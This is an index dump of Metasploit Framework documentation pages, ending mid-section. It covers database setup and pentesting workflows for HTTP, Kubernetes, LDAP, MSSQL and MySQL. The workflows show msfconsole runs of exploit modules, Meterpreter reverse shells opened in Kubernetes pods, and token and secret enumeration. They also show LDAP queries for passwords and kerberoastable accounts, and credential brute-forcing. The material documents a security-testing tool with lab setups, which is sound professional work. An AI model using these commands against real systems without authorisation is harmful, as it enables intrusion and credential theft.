    "url": "/docs/using-metasploit/intermediate/metasploit-database-support.html#msfdb-errors",
    "relUrl": "/docs/using-metasploit/intermediate/metasploit-database-support.html#msfdb-errors"
  },"562": {
    "doc": "Database Support",
    "title": "What’s next?",
    "content": "That’s it for the simple high level explanation of how to setup a database for metasploit. If that wasn’t enough detail for you you can check out our more in depth explanation here. If you want to get started hacking but don’t know how to, here are a few guides we really like: . | The easiest metasploit guide you’ll ever read - A great, easy to follow guide on how to set up Metasploit and Metasploitable (Our intentionally vulnerable Linux virtual machine used to for security training) for VMs. Also has a fantastic guide on penetration testing Metasploitable 2, from information gathering right up to exploitation. | Offensive Security: Metasploit Unleashed - Still dealing with Metasploitable 2, this guide covers similar content as the The easiest metasploit guide you’ll ever read, but with much more detail. | . However, if you’re confident in your knowledge of Metasploit and just want to get stuck in, then get stuck in! Good luck, be nice and have fun. ",
    "url": "/docs/using-metasploit/intermediate/metasploit-database-support.html#whats-next",
    "relUrl": "/docs/using-metasploit/intermediate/metasploit-database-support.html#whats-next"
  },"563": {
    "doc": "Database Support",
    "title": "Database Support",
    "content": " ",
    "url": "/docs/using-metasploit/intermediate/metasploit-database-support.html",
    "relUrl": "/docs/using-metasploit/intermediate/metasploit-database-support.html"
  },"564": {
    "doc": "Metasploit Framework Wish List",
    "title": "Always useful",
    "content": ". | If you’re unfamiliar with Metasploit or looking to tackle some smaller projects, we’ll thank you a million times over to look at our issue queue. Submitting bug fixes, testing reported issues, and answering questions are all extremely helpful. | See an issue whose submitter didn’t give us much information about replication, their target environment, or their version of Metasploit? See if you can get some clarity to help out, or better yet, test it yourself! | You can also sort out feature requests in our issue queue. See something that sounds cool? Fantastic! Tinker away and submit a PR. | Write docs! Adding documentation is one of the best ways to help current and future users (especially beginners) and save developers pain. | Check out PRs in the attic and see if you can pick up where another contributor left off or got stuck. | . ",
    "url": "/docs/development/roadmap/metasploit-framework-wish-list.html#always-useful",
    "relUrl": "/docs/development/roadmap/metasploit-framework-wish-list.html#always-useful"
  },"565": {
    "doc": "Metasploit Framework Wish List",
    "title": "A few other ideas",
    "content": ". | Implement transport switching for Mettle. | Improve network evasions across multiple protocols. Client headers abound with telltales! | Add UPnP recon and fuzzing library support (there’s a fun thread on this idea here) | . ",
    "url": "/docs/development/roadmap/metasploit-framework-wish-list.html#a-few-other-ideas",
    "relUrl": "/docs/development/roadmap/metasploit-framework-wish-list.html#a-few-other-ideas"
  },"566": {
    "doc": "Metasploit Framework Wish List",
    "title": "Metasploit Framework Wish List",
    "content": "We are frequently asked what would be useful as a contribution to the project. There’s evergreen advice below, as well as a few more specific wish list ideas from our team. ",
    "url": "/docs/development/roadmap/metasploit-framework-wish-list.html",
    "relUrl": "/docs/development/roadmap/metasploit-framework-wish-list.html"
  },"567": {
    "doc": "HTTP + HTTPS",
    "title": "HTTP Workflows",
    "content": "HTTP (Hypertext Transfer Protocol), is an application-level protocol for distributed, collaborative, hypermedia information systems. There are two main ports: . | 80/TCP - HTTP | 443/TCP - HTTPS (Hypertext Transport Protocol Secure) - encrypted using Transport Layer Security or, formerly, Secure Sockets Layer | . Note that any port can be used to run an application which communicates via HTTP/HTTPS. This document is generic advice for running and debugging HTTP based Metasploit modules, but it is best to use a Metasploit module which is specific to the application that you are pentesting. For instance: . msf6 &amp;gt; search tomcat http . HTTP Examples . Auxiliary modules: . use auxiliary/scanner/http/title run https://example.com . Specifying credentials and payload information: . use exploit/unix/http/cacti_filter_sqli_rce run http://admin:[email protected]/cacti/ lhost=tun0 lport=4444 run 'http://admin:pass with [email protected]/cacti/' lhost=tun0 lport=4444 . Specifying alternative ports: . run http://192.168.123.6:9001 . HTTP Debugging . You can log all HTTP requests and responses to the Metasploit console with the HttpTrace option, as well as enable additional verbose logging: . use auxiliary/scanner/http/title run http://example.com HttpTrace=true verbose=true . For instance: . msf6 &amp;gt; use scanner/http/title msf6 auxiliary(scanner/http/title) &amp;gt; set RHOSTS 127.0.0.1 RHOSTS =&amp;gt; 127.0.0.1 msf6 auxiliary(scanner/http/title) &amp;gt; set HttpTrace true HttpTrace =&amp;gt; true msf6 auxiliary(scanner/http/title) &amp;gt; run #################### # Request: #################### GET / HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) #################### # Response: #################### HTTP/1.0 200 OK Server: SimpleHTTP/0.6 Python/2.7.16 Date: Wed, 16 Dec 2020 01:16:32 GMT Content-type: text/html; charset=utf-8 Content-Length: 178 &amp;lt;!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\"&amp;gt;&amp;lt;html&amp;gt; &amp;lt;title&amp;gt;Directory listing for /&amp;lt;/title&amp;gt; &amp;lt;body&amp;gt; &amp;lt;h2&amp;gt;Directory listing for /&amp;lt;/h2&amp;gt; &amp;lt;hr&amp;gt; &amp;lt;ul&amp;gt; &amp;lt;/ul&amp;gt; &amp;lt;hr&amp;gt; &amp;lt;/body&amp;gt; &amp;lt;/html&amp;gt; [+] [127.0.0.1:80] [C:200] [R:] [S:SimpleHTTP/0.6 Python/2.7.16] Directory listing for / [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/http/title) &amp;gt; . To send all HTTP requests through a proxy, i.e. through Burp Suite: . use auxiliary/scanner/http/title run http://example.com HttpTrace=true verbose=true proxies=HTTP:127.0.0.1:8080 . HTTP Credentials . If the module has no username/password options, for instance to log into an admin portal of a web application etc, then the credentials supplied via a HTTP URI will set the HttpUsername/HttpPassword options for HTTP Basic access Authentication purposes. For instance, in the following module the username/password options will be set whilst the HttpUsername/HttpPassword options will not: . use exploit/unix/http/cacti_filter_sqli_rce Module options (exploit/unix/http/cacti_filter_sqli_rce): Name Current Setting Required Description ---- --------------- -------- ----------- ... Omitted ... * PASSWORD admin no Password to login with TARGETURI /cacti/ yes The URI of Cacti * USERNAME user yes User to login with ... Omitted ... check http://admin:[email protected]/cacti/ USERNAME and PASSWORD will be set to 'admin' and 'user' . For the following module, as there are no USERNAME/PASSWORD options, the HttpUsername/HttpPassword options will be chosen instead for HTTP Basic access Authentication purposes . use exploit/multi/http/tomcat_mgr_deploy run http://admin:[email protected]:8888 HttpTrace=true verbose=true lhost=192.168.123.1 . Note that the HttpUsername/HttpPassword may not be present in the options output, but can be found in the advanced module options: . use auxiliary/scanner/http/title advanced Module advanced options (auxiliary/scanner/http/title): Name Current Setting Required Description ---- --------------- -------- ----------- DOMAIN WORKSTATION yes The domain to use for Windows authentication DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers FingerprintCheck true no Conduct a pre-exploit fingerprint verification HttpClientTimeout no HTTP connection and receive timeout * HttpPassword no The HTTP password to specify for authentication HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers HttpTrace false no Show the raw HTTP requests and responses HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable) HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace * HttpUsername no The HTTP username to specify for authentication SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accept ed: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) ShowProgress true yes Display progress messages during a scan ShowProgressPercent 10 yes The interval in percent that progress should be shown UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 no The User-Agent header to use for all requests ) VERBOSE false no Enable detailed status messages WORKSPACE no Specify the workspace for this module . HTTP Multiple-Headers . Additional headers can be set via the HTTPRawHeaders option. A file containing a ERB template will be used to append to the headers section of the HTTP request. An example of an ERB template file is shown below. Header-Name-Here: &amp;lt;%= 'content of header goes here' %&amp;gt; . The following output shows leveraging the scraper scanner module with an additional header stored in additional_headers.txt. msf6 auxiliary(scanner/http/scraper) &amp;gt; cat additional_headers.txt [*] exec: cat additional_headers.txt X-Cookie-Header: &amp;lt;%= 'example-cookie' %&amp;gt; msf6 auxiliary(scanner/http/scraper) &amp;gt; set HTTPRAWHEADERS additional_headers.txt HTTPRAWHEADERS =&amp;gt; additional_headers.txt msf6 auxiliary(scanner/http/scraper) &amp;gt; exploit #################### # Request: #################### GET / HTTP/1.0 Host: 172.16.0.63:8000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15 X-Cookie-Header: example-cookie . ",
    "url": "/docs/pentesting/metasploit-guide-http.html#http-workflows",
    "relUrl": "/docs/pentesting/metasploit-guide-http.html#http-workflows"
  },"568": {
    "doc": "HTTP + HTTPS",
    "title": "HTTP + HTTPS",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-http.html",
    "relUrl": "/docs/pentesting/metasploit-guide-http.html"
  },"569": {
    "doc": "Kubernetes",
    "title": "Kubernetes Workflows",
    "content": "Metasploit has modules for both exploitation and enumeration of a Kubernetes cluster. These modules can either run through a compromised docker container, or external to the cluster if the required APIs are accessible: . | modules/auxiliary/cloud/kubernetes/enum_kubernetes | modules/exploit/multi/kubernetes/exec | . In the future there may be more modules than listed here, for the full list of modules run the search command within msfconsole: . msf6 &amp;gt; search kubernetes . Lab Environment . A tutorial for setting up a compromisable Kubernetes cluster can be found here . Kubernetes Enumeration . Metasploit has support for enumerating the Kubernetes API to extract the following information: . | Version - Enumerate Kubernetes service version, git commit, build date, etc | Auth - RBAC permission information, i.e. if the token can create pods, read secrets, etc | Namespaces - Enumerate available namespaces | Pods - Enumerate currently running pods | Secrets - Enumerate secrets, including base64 decoding to highlight noteworthy credentials, and storing loot | . The auxiliary/cloud/kubernetes/enum_kubernetes can be used to pivot through the compromised container to reach an previously inaccessible Kubernetes API. In this scenario the container’s Kubernetes service token will be read from the file system, and used to authenticate with the Kubernetes API: . If you have a Meterpreter session on a compromised Kubernetes container, the module values of NAMESPACE, TOKEN, RHOSTS and RPORT module options will be gathered from the session host automatically. The TOKEN will be read from the mounted /run/secrets/kubernetes.io/serviceaccount/token file if available: . use auxiliary/cloud/kubernetes/enum_kubernetes run session=-1 . If the Kubernetes API is publicly accessible and you have a JWT Token: . msf6 &amp;gt; use cloud/kubernetes/enum_kubernetes msf6 auxiliary(cloud/kubernetes/enum_kubernetes) &amp;gt; set RHOST https://kubernetes.docker.internal:6443 RHOST =&amp;gt; https://kubernetes.docker.internal:6443 msf6 auxiliary(cloud/kubernetes/enum_kubernetes) &amp;gt; set TOKEN eyJhbGciO... TOKEN =&amp;gt; eyJhbGciO... msf6 auxiliary(cloud/kubernetes/enum_kubernetes) &amp;gt; run [*] Running module against 127.0.0.1 [+] Kubernetes service version: {\"major\":\"1\",\"minor\":\"21\",\"gitVersion\":\"v1.21.2\",\"gitCommit\":\"092fbfbf53427de67cac1e9fa54aaa09a28371d7\",\"gitTreeState\":\"clean\",\"buildDate\":\"2021-06-16T12:53:14Z\",\"goVersion\":\"go1.16.5\",\"compiler\":\"gc\",\"platform\":\"linux/amd64\"} [+] Enumerating namespaces Namespaces ========== # name - ---- 0 default 1 kube-node-lease 2 kube-public 3 kube-system 4 kubernetes-dashboard ... etc ... By default the run command will enumerate all resources available, but you can also specify which actions you would like to perform: . msf6 auxiliary(cloud/kubernetes/enum_kubernetes) &amp;gt; show actions Auxiliary actions: Name Description ---- ----------- all enumerate all resources auth enumerate auth namespace enumerate namespace namespaces enumerate namespaces pod enumerate pod pods enumerate pods secret enumerate secret secrets enumerate secrets version enumerate version . More usage examples: . # Configuration use cloud/kubernetes/enum_kubernetes set RHOST https://kubernetes.docker.internal:6443 set TOKEN eyJhbGciOiJSUz... # Enumeration, filtering, and displaying information: run namespaces namespaces name=kube-public auth auth output=json secrets pods pod pod namespace=default name=redis-7fd956df5-sbchb pod namespace=default name=redis-7fd956df5-sbchb output=json pod namespace=default name=redis-7fd956df5-sbchb output=table version . Kubernetes Execution . The exploit/multi/kubernetes/exec module will attempt to create a new pod in the specified namespace, as well as mounting the host’s filesystem at /host_mnt if the required permissions are available. This module can either use websockets for communication, similar to the kubectl exec --stdin --tty command, or upload a full Meterpreter payload. If you have a Meterpreter session on a compromised Kubernetes container with the available permissions, the module values of NAMESPACE, TOKEN, RHOSTS and RPORT module options will be gathered from the session host automatically. The TOKEN will be read from the mounted /run/secrets/kubernetes.io/serviceaccount/token file if available: . msf6 exploit(multi/kubernetes/exec) &amp;gt; set TARGET Interactive\\ WebSocket TARGET =&amp;gt; Interactive WebSocket msf6 exploit(multi/kubernetes/exec) &amp;gt; run RHOST=\"\" RPORT=\"\" POD=\"\" SESSION=-1 [*] Routing traffic through session: 1 [+] Kubernetes service host: 10.96.0.1:443 [*] Using image: busybox [+] Pod created: burhgvzc [*] Waiting for the pod to be ready... [+] Successfully established the WebSocket [*] Found shell. [*] Command shell session 2 opened (172.17.0.31:59437 -&amp;gt; 10.96.0.1:443) at 2021-10-01 10:05:57 -0400 id uid=0(root) gid=0(root) groups=10(wheel) pwd / . If the Kubernetes API is available remotely, the RHOST values and token can be set manually. In this scenario a token is manually specified, to execute a Python Meterpreter payload within the thinkphp-67f7c88cc9-tgpfh pod: . msf6 &amp;gt; use exploit/multi/kubernetes/exec [*] Using configured payload python/meterpreter/reverse_tcp msf6 exploit(multi/kubernetes/exec) &amp;gt; set TOKEN eyJhbGciOiJSUzI1... TOKEN =&amp;gt; eyJhbGciOiJSUzI1... msf6 exploit(multi/kubernetes/exec) &amp;gt; set POD thinkphp-67f7c88cc9-tgpfh POD =&amp;gt; thinkphp-67f7c88cc9-tgpfh msf6 exploit(multi/kubernetes/exec) &amp;gt; set RHOSTS 192.168.159.31 RHOSTS =&amp;gt; 192.168.159.31 msf6 exploit(multi/kubernetes/exec) &amp;gt; set TARGET Python TARGET =&amp;gt; Python msf6 exploit(multi/kubernetes/exec) &amp;gt; set PAYLOAD python/meterpreter/reverse_tcp PAYLOAD =&amp;gt; python/meterpreter/reverse_tcp msf6 exploit(multi/kubernetes/exec) &amp;gt; run [*] Started reverse TCP handler on 192.168.159.128:4444 [*] Sending stage (39736 bytes) to 192.168.159.31 [*] Meterpreter session 1 opened (192.168.159.128:4444 -&amp;gt; 192.168.159.31:59234) at 2021-10-01 09:55:00 -0400 meterpreter &amp;gt; getuid Server username: root meterpreter &amp;gt; sysinfo Computer : thinkphp-67f7c88cc9-tgpfh OS : Linux 5.4.0-88-generic #99-Ubuntu SMP Thu Sep 23 17:29:00 UTC 2021 Architecture : x64 Meterpreter : python/linux meterpreter &amp;gt; background [*] Backgrounding session 1... msf6 exploit(multi/kubernetes/exec) &amp;gt; . ",
    "url": "/docs/pentesting/metasploit-guide-kubernetes.html#kubernetes-workflows",
    "relUrl": "/docs/pentesting/metasploit-guide-kubernetes.html#kubernetes-workflows"
  },"570": {
    "doc": "Kubernetes",
    "title": "Kubernetes",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-kubernetes.html",
    "relUrl": "/docs/pentesting/metasploit-guide-kubernetes.html"
  },"571": {
    "doc": "LDAP",
    "title": "LDAP Workflows",
    "content": "Lightweight Directory Access Protocol (LDAP) is a method for obtaining distributed directory information from a service. For Windows Active Directory environments this is a useful method of enumerating users, computers, misconfigurations, etc. LDAP on Windows environments are found on: . | 389/TCP - LDAP | 636/TCP - LDAPS | 3268 - Global Catalog LDAP | 3269 - Global Catalog LDAPS | . Lab Environment . LDAP support is enabled by default on a Windows environment when you install Active Directory. For LDAPS support to be enabled on port 636, you will have to configure AD CS (Active Directory Certificate Services) . Authentication . The LDAP module supports the following forms of authentication with the LDAP::Auth option: . | auto | ntlm | kerberos - Example below | plaintext | none | . LDAP Enumeration . The auxiliary/gather/ldap_query.rb module can be used for querying LDAP: . use auxiliary/gather/ldap_query run rhost=192.168.123.13 [email protected] password=p4$$w0rd action=ENUM_ACCOUNTS . Example output: . msf6 auxiliary(gather/ldap_query) &amp;gt; run rhost=192.168.123.13 [email protected] password=p4$$w0rd action=ENUM_ACCOUNTS [*] Running module against 192.168.123.13 [*] Discovering base DN automatically [+] 192.168.123.13:389 Discovered base DN: DC=domain,DC=local CN=Administrator CN=Users DC=domain DC=local ========================================== Name Attributes ---- ---------- badpwdcount 0 description Built-in account for administering the computer/domain lastlogoff 1601-01-01 00:00:00 UTC lastlogon 2023-01-23 11:02:49 UTC logoncount 159 memberof CN=Group Policy Creator Owners,CN=Users,DC=domain,DC=local || CN=Domain Admins,CN=Users,DC=domain,DC=local | CN=Enterprise Admins,CN=Users,DC=domain,DC=local || CN=Schema Admins,CN=Users,DC=domain,DC=local || CN=Adm inistrators,CN=Builtin,DC=domain,DC=local name Administrator objectsid S-1-5-21-3402587289-1488798532-3618296993-500 pwdlastset 133189448681297271 samaccountname Administrator useraccountcontrol 512 ... etc ... This module has a selection of inbuilt queries which can be configured via the action setting to make enumeration easier: . | ENUM_ACCOUNTS - Dump info about all known user accounts in the domain. | ENUM_AD_CS_CAS - Enumerate AD CS certificate authorities. | ENUM_AD_CS_CERT_TEMPLATES - Enumerate AD CS certificate templates. | ENUM_ADMIN_OBJECTS - Dump info about all objects with protected ACLs (i.e highly privileged objects). | ENUM_ALL_OBJECT_CATEGORY - Dump all objects containing any objectCategory field. | ENUM_ALL_OBJECT_CLASS - Dump all objects containing any objectClass field. | ENUM_COMPUTERS - Dump all objects containing an objectCategory or objectClass of Computer. | ENUM_CONSTRAINED_DELEGATION - Dump info about all known objects that allow constrained delegation. | ENUM_DNS_RECORDS - Dump info about DNS records the server knows about using the dnsNode object class. | ENUM_DNS_ZONES - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This isneeded - as without this BASEDN prefix we often miss certain entries. | ENUM_DOMAIN - Dump info about the Active Directory domain. | ENUM_DOMAIN_CONTROLLERS - Dump all known domain controllers. | ENUM_EXCHANGE_RECIPIENTS - Dump info about all known Exchange recipients. | ENUM_EXCHANGE_SERVERS - Dump info about all known Exchange servers. | ENUM_GMSA_HASHES - Dump info about GMSAs and their password hashes if available. | ENUM_GROUPS - Dump info about all known groups in the LDAP environment. | ENUM_GROUP_POLICY_OBJECTS - Dump info about all known Group Policy Objects (GPOs) in the LDAP environment. | ENUM_HOSTNAMES - Dump info about all known hostnames in the LDAP environment. | ENUM_LAPS_PASSWORDS - Dump info about computers that have LAPS enabled, and passwords for them if available. | ENUM_LDAP_SERVER_METADATA - Dump metadata about the setup of the domain. | ENUM_MACHINE_ACCOUNT_QUOTA - Dump the number of computer accounts a user is allowed to create in a domain. | ENUM_ORGROLES - Dump info about all known organization roles in the LDAP environment. | ENUM_ORGUNITS - Dump info about all known organizational units in the LDAP environment. | ENUM_UNCONSTRAINED_DELEGATION - Dump info about all known objects that allow unconstrained delegation. | ENUM_USER_ACCOUNT_DISABLED - Dump info about disabled user accounts. | ENUM_USER_ACCOUNT_LOCKED_OUT - Dump info about locked out user accounts. | ENUM_USER_ASREP_ROASTABLE - Dump info about all users who are configured not to require kerberos pre-authentication and are therefore AS-REP roastable. | ENUM_USER_PASSWORD_NEVER_EXPIRES - Dump info about all users whose password never expires. | ENUM_USER_PASSWORD_NOT_REQUIRED - Dump info about all users whose password never expires and whose account is still enabled. | ENUM_USER_SPNS_KERBEROAST - Dump info about all user objects with Service Principal Names (SPNs) for kerberoasting. | . Kerberos Authentication . Details on the Kerberos specific option names are documented in Kerberos Service Authentication . Query LDAP for accounts: . msf6 &amp;gt; use auxiliary/gather/ldap_query msf6 auxiliary(gather/ldap_query) &amp;gt; run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13 [*] Running module against 192.168.123.13 [+] 192.168.123.13:88 - Received a valid TGT-Response [*] 192.168.123.13:389 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_216797.bin [+] 192.168.123.13:88 - Received a valid TGS-Response [*] 192.168.123.13:389 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_638903.bin [+] 192.168.123.13:88 - Received a valid delegation TGS-Response [*] Discovering base DN automatically [+] 192.168.123.13:389 Discovered base DN: DC=domain,DC=local CN=Administrator CN=Users DC=domain DC=local ============================================ Name Attributes ---- ---------- badpwdcount 0 pwdlastset 133184302034979121 samaccountname Administrator useraccountcontrol 512 ... etc ... ",
    "url": "/docs/pentesting/metasploit-guide-ldap.html#ldap-workflows",
    "relUrl": "/docs/pentesting/metasploit-guide-ldap.html#ldap-workflows"
  },"572": {
    "doc": "LDAP",
    "title": "LDAP",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-ldap.html",
    "relUrl": "/docs/pentesting/metasploit-guide-ldap.html"
  },"573": {
    "doc": "MSSQL",
    "title": "MSSQL Workflows",
    "content": "Microsoft SQL Server (MSSQL) is a relational database management system. Commonly used in conjunction with web applications and other software that need to persist data. MSSQL is a useful target for data extraction and code execution. MSSQL is frequently found on port on the following ports: . | 1433/TCP | 1434/UDP | . For a full list of MSSQL modules run the search command within msfconsole: . msf6 &amp;gt; search mssql . Or to search for modules that work with a specific session type: . msf6 &amp;gt; search session_type:mssql . Lab Environment . Environment setup: . | Either follow Microsoft’s SQL Server installation guide or use chocolatey package manager | Enable TCP access within the SQL Server Configuration Manager | Optional: Microsoft’s sqlcmd utility can be installed separately for querying the database from your host machine | Optional: Configure Windows firewall to allow MSSQL server access | . MSSQL Enumeration . Running queries . use auxiliary/admin/mssql/mssql_sql run rhost=192.168.123.13 username=administrator password=p4$$w0rd sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid' . Logging in and obtaining a session . To log in or obtain an interactive session on an MSSQL instance running on the target, use mssql_login . use auxiliary/scanner/mssql_login run CreateSession=true RPORT=1433 RHOSTS=192.168.2.242 USERNAME=user PASSWORD=password . The CreateSession option, when set to true, will result in returning an interactive MSSQL session with the target machine on a successful login: . [*] 192.168.2.242:1433 - 192.168.2.242:1433 - MSSQL - Starting authentication scanner. [!] 192.168.2.242:1433 - No active DB -- Credential data will not be saved! [+] 192.168.2.242:1433 - 192.168.2.242:1433 - Login Successful: WORKSTATION\\user:password [*] MSSQL session 1 opened (192.168.2.1:60963 -&amp;gt; 192.168.2.242:1433) at 2024-03-15 13:41:31 -0500 [*] 192.168.2.242:1433 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed . Which you can interact with using sessions -i &amp;lt;session id&amp;gt; or sessions -i -1 to interact with the most recently opened session. msf6 auxiliary(scanner/mssql/mssql_login) &amp;gt; sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 mssql MSSQL test @ 192.168.2.242:1433 192.168.2.1:60963 -&amp;gt; 192.168.23.242:1433 (192.168.2.242) msf6 auxiliary(scanner/mssql/mssql_login) &amp;gt; sessions -i 1 [*] Starting interaction with 1... mssql @ 192.168.2.242:1433 (master) &amp;gt; query 'select @@version;' Response ======== # NULL - ---- 0 Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64) Oct 8 2022 05:58:25 Copyright (C) 2022 Microsoft Corporation Developer Edition (64-bit) on Windows Server 2022 Stand ard 10.0 &amp;lt;X64&amp;gt; (Build 20348: ) (Hypervisor) . When interacting with a session, the help command can be useful: . mssql @ 192.168.2.242:1433 (master) &amp;gt; help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session bg Alias for background exit Terminate the PostgreSQL session help Help menu irb Open an interactive Ruby shell on the current session pry Open the Pry debugger on the current session sessions Quickly switch to another session MSSQL Client Commands ===================== Command Description ------- ----------- query Run a single SQL query query_interactive Enter an interactive prompt for running multiple SQL queries Local File System Commands ========================== Command Description ------- ----------- getlwd Print local working directory (alias for lpwd) lcat Read the contents of a local file to the screen lcd Change local working directory ldir List local files (alias for lls) lls List local files lmkdir Create new directory on local machine lpwd Print local working directory This session also works with the following modules: auxiliary/admin/mssql/mssql_enum auxiliary/admin/mssql/mssql_escalate_dbowner auxiliary/admin/mssql/mssql_escalate_execute_as auxiliary/admin/mssql/mssql_exec auxiliary/admin/mssql/mssql_findandsampledata auxiliary/admin/mssql/mssql_idf auxiliary/admin/mssql/mssql_sql auxiliary/admin/mssql/mssql_sql_file auxiliary/scanner/mssql/mssql_hashdump auxiliary/scanner/mssql/mssql_schemadump exploit/windows/mssql/mssql_payload . To interact directly with the session as if in a SQL prompt, you can use the query command. msf6 auxiliary(scanner/mssql/mssql_login) &amp;gt; sessions -i -1 [*] Starting interaction with 2... mssql @ 192.168.2.242:1433 (master) &amp;gt; query -h Usage: query Run a single SQL query on the target. OPTIONS: -h, --help Help menu. -i, --interact Enter an interactive prompt for running multiple SQL queries Examples: query select @@version; query select user_name(); query select name from master.dbo.sysdatabases; mssql @ 192.168.2.242:1433 (master) &amp;gt; query 'select @@version;' Response ======== # NULL - ---- 0 Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64) Oct 8 2022 05:58:25 Copyright (C) 2022 Microsoft Corporation Developer Edition (64-bit) on Windows Server 2022 Standard 10.0 &amp;lt;X64&amp;gt; (B uild 20348: ) (Hypervisor) . Alternatively you can enter a SQL prompt via the query_interactive command which supports multiline commands: . mssql @ 192.168.2.242:1433 (master) &amp;gt; query_interactive -h Usage: query_interactive Go into an interactive SQL shell where SQL queries can be executed. To exit, type 'exit', 'quit', 'end' or 'stop'. mssql @ 192.168.2.242:1433 (master) &amp;gt; query_interactive [*] Starting interactive SQL shell for mssql @ 192.168.2.242:1433 (master) [*] SQL commands ending with ; will be executed on the remote server. Use the exit command to exit. SQL &amp;gt;&amp;gt; select * SQL *&amp;gt; from information_schema.tables SQL *&amp;gt; where table_type = 'BASE TABLE'; [*] Executing query: select * from information_schema.tables where table_type = 'BASE TABLE'; Response ======== # TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE - ------------- ------------ ---------- ---------- 0 master dbo spt_fallback_db BASE TABLE 1 master dbo spt_fallback_dev BASE TABLE 2 master dbo spt_fallback_usg BASE TABLE 4 master dbo Users BASE TABLE 5 master dbo spt_monitor BASE TABLE 6 master dbo MSreplication_options BASE TABLE SQL &amp;gt;&amp;gt; . Link crawling . Identify if the SQL server has been configured with trusted links, which allows running queries on other MSSQL instances: . use windows/mssql/mssql_linkcrawler run rhost=192.168.123.13 username=administrator password=p4$$w0rd . Kerberos Authentication . Details on the Kerberos specific option names are documented in Kerberos Service Authentication . Connect to a Microsoft SQL Server instance and run a query: . msf6 &amp;gt; use auxiliary/admin/mssql/mssql_sql msf6 auxiliary(admin/mssql/mssql_sql) &amp;gt; run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid' [*] Reloading module... [*] Running module against 192.168.123.13 [*] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGT-Response [+] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGS-Response [*] 192.168.123.13:1433 - 192.168.123.13:88 - TGS MIT Credential Cache saved to ~/.msf4/loot/20220630193907_default_192.168.123.13_windows.kerberos_556101.bin [*] 192.168.123.13:1433 - SQL Query: select auth_scheme from sys.dm_exec_connections where session_id=@@spid [*] 192.168.123.13:1433 - Row Count: 1 (Status: 16 Command: 193) auth_scheme ----------- KERBEROS [*] Auxiliary module execution completed . ",
    "url": "/docs/pentesting/metasploit-guide-mssql.html#mssql-workflows",
    "relUrl": "/docs/pentesting/metasploit-guide-mssql.html#mssql-workflows"
  },"574": {
    "doc": "MSSQL",
    "title": "MSSQL",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-mssql.html",
    "relUrl": "/docs/pentesting/metasploit-guide-mssql.html"
  },"575": {
    "doc": "MySQL",
    "title": "MySQL",
    "content": "MySQL is frequently found on port 3306/TCP. It is an open-source relational database management system. Metasploit has support for multiple MySQL modules, including: . | Version enumeration | Verifying/bruteforcing credentials | Dumping database information | Executing arbitrary queries against the database | Executing arbitrary SQL queries against the database | Gaining reverse shells | . There are more modules than listed here, for the full list of modules run the search command within msfconsole: . msf6 &amp;gt; search mysql . Or to search for modules that work with a specific session type: . msf6 &amp;gt; search session_type:mysql . Lab Environment . When testing in a lab environment MySQL can either be installed on the host machine or within Docker: . docker run -it --rm -e MYSQL_ROOT_PASSWORD=' a b c p4$$w0rd' -p 3306:3306 mariadb:latest . MySQL Enumeration . Enumerate version: . use auxiliary/scanner/mysql/mysql_version run mysql://127.0.0.1 . MySQL Login / Bruteforce . If you have MySQL credentials to validate: . use auxiliary/scanner/mysql/mysql_login run 'mysql://root: a b c [email protected]' . Re-using MySQL credentials in a subnet: . use auxiliary/scanner/mysql/mysql_login run cidr:/24:mysql://user:[email protected] threads=50 . Using an alternative port: . use auxiliary/scanner/mysql/mysql_login run mysql://user:[email protected]:2222 . Brute-force host with known user and password list: . use auxiliary/scanner/mysql/mysql_login run mysql://[email protected] threads=50 pass_file=./wordlist.txt . Brute-force credentials: . use auxiliary/scanner/mysql/mysql_login run mysql://192.168.222.1 threads=50 user_file=./users.txt pass_file=./wordlist.txt . Brute-force credentials in a subnet: . use auxiliary/scanner/mysql/mysql_login run cidr:/24:mysql://user:[email protected] threads=50 run cidr:/24:mysql://[email protected] threads=50 pass_file=./wordlist.txt . Obtaining an Interactive Session on the Target . The CreateSession option in auxiliary/scanner/mysql/msql_login allows you to obtain an interactive session for the MySQL client you’re connecting to. The run command with CreateSession set to true should give you an interactive session: . msf6 &amp;gt; use scanner/mysql/mysql_login msf6 auxiliary(scanner/mysql/mysql_login) &amp;gt; run rhost=127.0.0.1 rport=4306 username=root password=password createsession=true [+] 